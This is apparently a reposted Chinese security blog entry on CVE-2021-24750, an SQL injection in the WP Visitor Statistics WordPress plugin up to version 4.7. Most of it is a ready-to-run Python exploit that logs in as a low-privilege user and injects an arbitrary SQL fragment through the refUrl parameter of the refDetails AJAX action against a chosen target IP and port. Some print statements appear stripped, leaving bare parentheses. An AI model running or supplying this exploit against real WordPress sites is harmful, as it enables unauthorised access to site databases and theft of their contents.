文章来源 :Khan安全攻防实验室
版本:<= 4.7
测试环境:Ubuntu 18.04
CVE:CVE-2021-24750
CWE:CWE-89
描述:
4.8 之前的 WP 访问者统计(实时流量)WordPress 插件无法正确清理和转义 refDetails AJAX 操作中的 refUrl,任何经过身份验证的用户都可以使用,这可能允许角色低至订阅者的用户执行 SQL 注入攻击。
https://nvd.nist.gov/vuln/detail/CVE-2021-24750
import argparse
import requests
from datetime import datetime
# User-Input:
my_parser = argparse.ArgumentParser(description=
'Wordpress Plugin WP Visitor Statistics - SQL Injection'
)
my_parser.add_argument(
'-T'
,
'--IP'
,
type
=str)
my_parser.add_argument(
'-P'
,
'--PORT'
,
type
=str)
my_parser.add_argument(
'-U'
,
'--PATH'
,
type
=str)
my_parser.add_argument(
'-u'
,
'--USERNAME'
,
type
=str)
my_parser.add_argument(
'-p'
,
'--PASSWORD'
,
type
=str)
my_parser.add_argument(
'-C'
,
'--COMMAND'
,
type
=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command
= args.COMMAND
(
''
)
(
'[*] Starting Exploit at: '
+ str(datetime.now().strftime(
'%H:%M:%S'
)))
(
''
)
# Authentication:
session = requests.Session()
auth_url =
'http://'
+ target_ip +
':'
+ target_port + wp_path +
'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host'
: target_ip,
'User-Agent'
:
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0'
,
'Accept'
:
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
,
'Accept-Language'
:
'de,en-US;q=0.7,en;q=0.3'
,
'Accept-Encoding'
:
'gzip, deflate'
,
'Content-Type'
:
'application/x-www-form-urlencoded'
,
'Origin'
:
'http://'
+ target_ip,
'Connection'
:
'close'
,
'Upgrade-Insecure-Requests'
:
'1'
}
# Body:
body = {
'log'
: username,
'pwd'
: password,
'wp-submit'
:
'Log In'
,
'testcookie'
:
'1'
}
auth = session.post(auth_url, headers=header, data=body)
# Exploit:
exploit_url =
'http://'
+ target_ip +
':'
+ target_port +
'/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"'
+
"' "
+
command
+
'"}'
exploit = session.get(exploit_url)
(exploit.text)
(
'Exploit finished at: '
+ str(datetime.now().strftime(
'%H:%M:%S'
)))
侵权请私聊公众号删文
原文始发于微信公众号(黑白之道):CVE-2021-24750 Wordpress 插件 WP 访问者统计 V 4.7 - SQL 注入
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论